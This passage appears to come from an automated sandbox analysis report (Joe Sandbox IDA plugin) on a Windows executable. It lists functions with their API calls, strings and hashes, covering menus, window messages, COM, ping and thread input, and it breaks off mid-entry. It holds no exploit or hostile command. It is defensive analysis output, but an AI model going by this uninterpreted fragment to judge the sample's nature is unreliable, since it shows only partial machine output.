                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction ID: 5f978f9283bef269e9a48bd5b4babc49506cd6016e0b78ab11812f95e2cc9a21
                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction Fuzzy Hash: 1771C9B1A04716ABD714BE79CC41B9AB3AAAF12324F14423EF514D7381E770DE408F94
                    Function 006E2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 006E2A31
                    • GetMenuItemInfoW.USER32(00746890,000000FF,00000000,00000030), ref: 006E2A92
                    • SetMenuItemInfoW.USER32(00746890,00000004,00000000,00000030), ref: 006E2AC8
                    • Sleep.KERNEL32(000001F4), ref: 006E2ADA
                    • GetMenuItemCount.USER32(?), ref: 006E2B1E
                    • GetMenuItemID.USER32(?,00000000), ref: 006E2B3A
                    • GetMenuItemID.USER32(?,-00000001), ref: 006E2B64
                    • GetMenuItemID.USER32(?,?), ref: 006E2BA9
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006E2BEF
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006E2C03
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006E2C24
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: e35c0da4f93ee544d8e3c7635be5675dff8a1f5b4530beaf65820c3ad1fbd0a3
                    • Instruction ID: 9d0823c423e6282080035cdd3fe2b2795aa39cff80e6584c29b1c451c12c6308
                    • Opcode Fuzzy Hash: e35c0da4f93ee544d8e3c7635be5675dff8a1f5b4530beaf65820c3ad1fbd0a3
                    • Instruction Fuzzy Hash: D161AEB090238AAFDB21CF65CC989EE7BBFFB01708F144569E84193251DB35AD46DB21
                    Function 00707192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00707214
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00707217
                    • GetWindowLongW.USER32(?,000000F0), ref: 0070723B
                    • _memset.LIBCMT ref: 0070724C
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0070725E
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007072D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 08be42d898f25416342eff7df9434cca1c0e662143fa355bd19cd6ff9f07bee4
                    • Instruction ID: 228387f3c4b36c036944507b77d0f7fc47feb05f1e48b3e6d310e5ecefe6dbee
                    • Opcode Fuzzy Hash: 08be42d898f25416342eff7df9434cca1c0e662143fa355bd19cd6ff9f07bee4
                    • Instruction Fuzzy Hash: 09617C75900248EFDB10DFA4CC81EEEB7F9AB0A710F144259FA14A72E1D778AD41DB64
                    Function 006D710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006D7135
                    • SafeArrayAllocData.OLEAUT32(?), ref: 006D718E
                    • VariantInit.OLEAUT32(?), ref: 006D71A0
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 006D71C0
                    • VariantCopy.OLEAUT32(?,?), ref: 006D7213
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 006D7227
                    • VariantClear.OLEAUT32(?), ref: 006D723C
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 006D7249
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006D7252
                    • VariantClear.OLEAUT32(?), ref: 006D7264
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006D726F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: 7b4b5c2638fc640b0b9de3ffe7783afa979a13842cbd514b88f8d44b969ad754
                    • Instruction ID: bfd087f397ea444743ba7ffced5f5683cb078f28871c06f5fa8bf2ba236ead5d
                    • Opcode Fuzzy Hash: 7b4b5c2638fc640b0b9de3ffe7783afa979a13842cbd514b88f8d44b969ad754
                    • Instruction Fuzzy Hash: F1416F31D00219EFCB10DFA4DC889AEBBB9FF08354F00816AF905A7361DB34AA45CB95
                    Function 006F86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                    • CoInitialize.OLE32 ref: 006F8718
                    • CoUninitialize.OLE32 ref: 006F8723
                    • CoCreateInstance.OLE32(?,00000000,00000017,00712BEC,?), ref: 006F8783
                    • IIDFromString.OLE32(?,?), ref: 006F87F6
                    • VariantInit.OLEAUT32(?), ref: 006F8890
                    • VariantClear.OLEAUT32(?), ref: 006F88F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 834269672-1287834457
                    • Opcode ID: 3dfd36efa32ab7cbfe7b51d5d88008af600dc7e3e2d3065ec432eddd82eb73ba
                    • Instruction ID: ea382759310e546eddd6301b66abfa29462c6c397e59254223ce7bc0b352388a
                    • Opcode Fuzzy Hash: 3dfd36efa32ab7cbfe7b51d5d88008af600dc7e3e2d3065ec432eddd82eb73ba
                    • Instruction Fuzzy Hash: F461FF70608305AFD710EF24C848BAFBBEAAF44750F14495DFA919B291CB30ED44CB96
                    Function 006F5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • WSAStartup.WSOCK32(00000101,?), ref: 006F5AA6
                    • inet_addr.WSOCK32(?,?,?), ref: 006F5AEB
                    • gethostbyname.WSOCK32(?), ref: 006F5AF7
                    • IcmpCreateFile.IPHLPAPI ref: 006F5B05
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006F5B75
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006F5B8B
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 006F5C00
                    • WSACleanup.WSOCK32 ref: 006F5C06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: 46f22c4d8005e715558d1719329a40174e6b955b2b1db27d2de78cbddd0d0c4b
                    • Instruction ID: 1964fa8767eb8d8047ee3bde61853f41b8aee1d3e065213d827a75462e8d0865
                    • Opcode Fuzzy Hash: 46f22c4d8005e715558d1719329a40174e6b955b2b1db27d2de78cbddd0d0c4b
                    • Instruction Fuzzy Hash: 72517E31604704DFD720AF24CC59B7AB7E6EF48710F148A29F656DB2A1DB74EC018B5A
                    Function 006EB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 006EB73B
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006EB7B1
                    • GetLastError.KERNEL32 ref: 006EB7BB
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 006EB828
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: 3040ec983f8a0cae865db62e4ea773691cef3b086f2dde3762f78c02d75517c6
                    • Instruction ID: c685ccaa85857e6e9d65e97c994dbcc6a5bb400b3c7ea95cf178229d2441d473
                    • Opcode Fuzzy Hash: 3040ec983f8a0cae865db62e4ea773691cef3b086f2dde3762f78c02d75517c6
                    • Instruction Fuzzy Hash: 9F31A135A01348AFDB10EF65C886AFF77B6EF48700F148129E5029B392DB759942CB51
                    Function 006D9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 006DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006DB0E7
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006D94F6
                    • GetDlgCtrlID.USER32 ref: 006D9501
                    • GetParent.USER32 ref: 006D951D
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 006D9520
                    • GetDlgCtrlID.USER32(?), ref: 006D9529
                    • GetParent.USER32(?), ref: 006D9545
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 006D9548
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 9a84fad48f11de5cb211ad876d1d4f5af23b1f06db79352518d2806fcaae9aff
                    • Instruction ID: 9fe91a3e7e02c9957b8db89c8ca337a65640696dbb8d29b81a15b2ad3595fd74
                    • Opcode Fuzzy Hash: 9a84fad48f11de5cb211ad876d1d4f5af23b1f06db79352518d2806fcaae9aff
                    • Instruction Fuzzy Hash: 9D21E274D00204EBCF04AF64CC85DFEBBB6EF45300F10422AF622972E2DB7999199B24
                    Function 006D955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 006DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006DB0E7
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006D95DF
                    • GetDlgCtrlID.USER32 ref: 006D95EA
                    • GetParent.USER32 ref: 006D9606
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 006D9609
                    • GetDlgCtrlID.USER32(?), ref: 006D9612
                    • GetParent.USER32(?), ref: 006D962E
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 006D9631
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 8021ee3c79f12f541c7e1b6df11cbfd436adb13ba9111f27071ad25b39d4caf3
                    • Instruction ID: 499056be06a1b1a5141fd021145d3931ad23bbe058c4f330f0b563032ff007ae
                    • Opcode Fuzzy Hash: 8021ee3c79f12f541c7e1b6df11cbfd436adb13ba9111f27071ad25b39d4caf3
                    • Instruction Fuzzy Hash: C421B674D00204FBDF15AB64CCC5EFEBB75EF44300F10421AF611972A1DB7995199B24
                    Function 006D9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32 ref: 006D9651
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 006D9666
                    • _wcscmp.LIBCMT ref: 006D9678
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006D96F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: e77504bf7a2e008f79762f9ffcebd674b09c0f7447dabd7b44a774c9d11ccb22
                    • Instruction ID: 58de621099fbcad20ae42a7be67c21f7981ca5550e7a643452e307c6972e15c8
                    • Opcode Fuzzy Hash: e77504bf7a2e008f79762f9ffcebd674b09c0f7447dabd7b44a774c9d11ccb22
                    • Instruction Fuzzy Hash: 3C110A77648357BAF6113620DC06DE6B79E8B05360F20012BFA00E52D2FE96ED514A6C
                    Function 006E4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                    Download Yara Rule
                    APIs
                    • __swprintf.LIBCMT ref: 006E419D
                    • __swprintf.LIBCMT ref: 006E41AA
                      • Part of subcall function 006A38D8: __woutput_l.LIBCMT ref: 006A3931
                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 006E41D4
                    • LoadResource.KERNEL32(?,00000000), ref: 006E41E0
                    • LockResource.KERNEL32(00000000), ref: 006E41ED
                    • FindResourceW.KERNEL32(?,?,00000003), ref: 006E420D
                    • LoadResource.KERNEL32(?,00000000), ref: 006E421F
                    • SizeofResource.KERNEL32(?,00000000), ref: 006E422E
                    • LockResource.KERNEL32(?), ref: 006E423A
                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006E429B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                    • String ID:
                    • API String ID: 1433390588-0
                    • Opcode ID: b2aecb14866852af471d1635855e9a2cb8032392826b609b5bfb3d9ce46f37c7
                    • Instruction ID: ee7c38594a8406dbce18503fbe2d14e36a4c1cbc9599801153b520d3bd5b05de
                    • Opcode Fuzzy Hash: b2aecb14866852af471d1635855e9a2cb8032392826b609b5bfb3d9ce46f37c7
                    • Instruction Fuzzy Hash: 4F31917550625AAFDB119F61DC48ABF7BAEFF09301F008525F901D6250EB34DA61CBA4
                    Function 006E16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 006E1700
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006E0778,?,00000001), ref: 006E1714
                    • GetWindowThreadProcessId.USER32(00000000), ref: 006E171B
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006E0778,?,00000001), ref: 006E172A
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 006E173C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006E0778,?,00000001), ref: 006E1755
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006E0778,?,00000001), ref: 006E1767
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006E0778,?,00000001), ref: 006E17AC
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006E0778,?,00000001), ref: 006E17C1
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006E0778,?,00000001), ref: 006E17CC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: d55979fffb9b48e653e85ac38207554a4c9b7bd48ef93c40e6cf4f447ac8ffcd
                    • Instruction ID: c4f0fd7598c77792e48ccb0830363961a7a031e33b892e6fa04bc9d76c6c9575
                    • Opcode Fuzzy Hash: d55979fffb9b48e653e85ac38207554a4c9b7bd48ef93c40e6cf4f447ac8ffcd
                    • Instruction Fuzzy Hash: E931A079601344EBDB25DF15DC84BA937AAAB1BB52F108016F8008E3A0DB789D45DB54
                    Function 006F9428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: ,,q$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-1224034363
                    • Opcode ID: 4448791c1dc199f3b8891d5791caf8b8de5b7ab18696a4bb7374f84ad2a7a4cd
                    • Instruction ID: 58c9eac74d24941004bf868977df1a3aac0801f2df6646ec7853c11642c3f9a2
                    • Opcode Fuzzy Hash: 4448791c1dc199f3b8891d5791caf8b8de5b7ab18696a4bb7374f84ad2a7a4cd
                    • Instruction Fuzzy Hash: D6919B71A00219ABEF24DFA5C848FEEBBBAEF45710F108159F615EB281D7709945CFA0
                    Function 006DA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                    Download Yara Rule
                    APIs
                    • EnumChildWindows.USER32(?,006DAA64), ref: 006DA9A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: e3bfb8dac74886c555e0b9dd61f20ff8099f46f612a8fdea4548df6f887893c3
                    • Instruction ID: 345b7ece028e3b0ebf1ba7a1528b756821fe07635ad5df03635b24b50d9cf899
                    • Opcode Fuzzy Hash: e3bfb8dac74886c555e0b9dd61f20ff8099f46f612a8fdea4548df6f887893c3
                    • Instruction Fuzzy Hash: 2391B771D04506DBDB58EFA0C491BE9F776BF04300F50812EE99AA7341DF30AA5ACB95
                    Function 00682E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                    Download Yara Rule
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00682EAE
                      • Part of subcall function 00681DB3: GetClientRect.USER32(?,?), ref: 00681DDC
                      • Part of subcall function 00681DB3: GetWindowRect.USER32(?,?), ref: 00681E1D
                      • Part of subcall function 00681DB3: ScreenToClient.USER32(?,?), ref: 00681E45
                    • GetDC.USER32 ref: 006BCF82
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006BCF95
                    • SelectObject.GDI32(00000000,00000000), ref: 006BCFA3
                    • SelectObject.GDI32(00000000,00000000), ref: 006BCFB8
                    • ReleaseDC.USER32(?,00000000), ref: 006BCFC0
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006BD04B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 4fdd6aa6d22b61821d983eae84e697eb9b48158ab49db625511411c01a4c733e
                    • Instruction ID: 4efc2c811f5610e678ececcf75fd0ea6794575964c27dae3ea36f53023294d8f
                    • Opcode Fuzzy Hash: 4fdd6aa6d22b61821d983eae84e697eb9b48158ab49db625511411c01a4c733e
                    • Instruction Fuzzy Hash: AF71E5B0400205DFCF219F64C894AFA3BBBFF49364F14836AED555A2A6D7318D82DB61
                    Function 006F8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0070F910), ref: 006F903D
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0070F910), ref: 006F9071
